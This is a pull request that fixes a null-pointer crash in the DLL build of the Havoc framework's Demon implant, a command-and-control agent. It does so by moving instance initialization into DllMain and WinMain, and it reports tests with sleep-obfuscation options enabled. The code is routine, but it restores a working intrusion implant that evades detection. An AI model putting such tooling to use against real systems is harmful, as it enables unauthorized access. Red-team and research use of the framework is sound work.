### PR TITLE
Fix Demon DLL

### DIFF
--- a/payloads/Demon/src/Demon.c
+++ b/payloads/Demon/src/Demon.c
@@ -33,11 +33,6 @@ SEC_DATA BYTE      AgentConfig[] = CONFIG_BYTES;
  */
 VOID DemonMain( PVOID ModuleInst, PKAYN_ARGS KArgs )
 {
-    INSTANCE Inst = { 0 };
-
-    /* "allocate" instance on stack */
-    Instance = & Inst;
-
     /* Initialize Win32 API, Load Modules and Syscalls stubs (if we specified it) */
     DemonInit( ModuleInst, KArgs );
 

--- a/payloads/Demon/src/main/MainDll.c
+++ b/payloads/Demon/src/main/MainDll.c
@@ -30,6 +30,8 @@ DLLEXPORT BOOL WINAPI DllMain(
 
     if ( Reason == DLL_PROCESS_ATTACH )
     {
+        static INSTANCE Inst = { 0 };
+        Instance = & Inst;
 
 #if !defined(SHELLCODE) && defined(DEBUG)
         /* if the dll is compiled in debug mode start a console to write our debug prints to */

--- a/payloads/Demon/src/main/MainExe.c
+++ b/payloads/Demon/src/main/MainExe.c
@@ -3,6 +3,12 @@
 INT WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, INT nShowCmd )
 {
     PRINTF( "WinMain: hInstance:[%p] hPrevInstance:[%p] lpCmdLine:[%s] nShowCmd:[%d]\n", hInstance, hPrevInstance, lpCmdLine, nShowCmd )
+
+    INSTANCE Inst = { 0 };
+
+    /* "allocate" instance on stack */
+    Instance = & Inst;
+
     DemonMain( NULL, NULL );
     return 0;
 }


### PR DESCRIPTION
**Overview**
This PR fixes the Demon DLL crash caused by a null pointer dereference.
TLDR: `rundll32 demon.x64.dll,Start` will work again.

**Details**
`LdrModulePeb` is called in `DllMain` before `Instance` has been initialized.
https://github.com/HavocFramework/Havoc/blob/69ce17cb3686641e92a657cece5989feb9af64ed/payloads/Demon/src/main/MainDll.c#L47
`LdrModulePeb` accesses the uninitialized `Instance`, which is a null pointer derefernce at this point of execution, causing the process to crash.
https://github.com/HavocFramework/Havoc/blob/69ce17cb3686641e92a657cece5989feb9af64ed/payloads/Demon/src/core/Win32.c#L74

I’ve tested the x64 EXE, DLL, and SHC on Windows 11, with `WaitForSingleObjectEx`, `Foliage`, `Ekko` and `Zilean` sleep obfuscation enabled and all binaries are operating well with this update.